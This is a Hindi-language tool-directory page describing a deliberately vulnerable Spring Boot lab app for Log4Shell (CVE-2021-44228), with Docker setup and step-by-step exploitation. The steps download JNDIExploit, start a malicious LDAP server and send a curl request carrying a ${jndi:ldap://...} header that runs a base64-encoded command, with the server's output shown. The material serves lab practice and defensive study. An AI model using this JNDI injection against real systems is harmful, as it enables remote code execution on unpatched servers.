Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4shell-vulnerable-app — Spring Boot वेब एप्लिकेशन CVE-2021-44228 के लिए असुरक्षित है, जिसे Log4Shell उपनाम दिया गया है। | Kitploit
उपकरण/GitHubGitHub/bsigouin/log4shell-vulnerable-app
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubbsigouin/log4shell-vulnerable-app

log4shell-vulnerable-app

Spring Boot वेब एप्लिकेशन CVE-2021-44228 के लिए असुरक्षित है, जिसे Log4Shell उपनाम दिया गया है।

रिपॉजिटरी देखें
23 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell नमूना संवेदनशील अनुप्रयोग (CVE-2021-44228)

इस रिपॉजिटरी में एक Spring Boot वेब एप्लिकेशन है जो CVE-2021-44228 के प्रति संवेदनशील है, जिसे Log4Shell उपनाम दिया गया है।

यह Log4j 2.14.1 (spring-boot-starter-log4j2 2.6.1 के माध्यम से) और JDK 1.8.0_181 का उपयोग करता है।

एप्लिकेशन चलाना

इसे चलाएं:

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

इसे स्वयं बनाएं (आपको किसी Java-संबंधित उपकरण की आवश्यकता नहीं है):

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

शोषण के चरण

नोट: यह मूल LunaSec सलाह से अत्यधिक प्रेरित है। ।

अपने जोखिम पर चलाएं, अधिमानतः एक सैंडबॉक्स वातावरण में VM में

अपडेट (13 दिसंबर): JNDIExploit रिपॉजिटरी को GitHub से हटा दिया गया है (संभवतः, GitHub द्वारा नहीं)। नीचे दिए गए JNDIExploit डाउनलोड URL के सामने web.archive.org जोड़कर Wayback Machine द्वारा कैश किए गए संस्करण का उपयोग करें।

  • एक दुर्भावनापूर्ण LDAP सर्वर चालू करने के लिए JNDIExploit का उपयोग करें
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • फिर, इसका उपयोग करके शोषण को ट्रिगर करें:
root@kitploit:~
# 'touch /tmp/pwned' निष्पादित करेगा
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • JNDIExploit के आउटपुट पर ध्यान दें, जो दर्शाता है कि इसने एक दुर्भावनापूर्ण LDAP प्रतिक्रिया भेजी है और दूसरे चरण का पेलोड प्रस्तुत किया है:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • यह पुष्टि करने के लिए कि कोड निष्पादन सफल रहा, ध्यान दें कि संवेदनशील एप्लिकेशन चलाने वाले कंटेनर में फ़ाइल /tmp/pwned.txt बनाई गई थी:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

संदर्भ

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

योगदानकर्ता

@christophetd @rayhan0x01

टूल डाउनलोड करें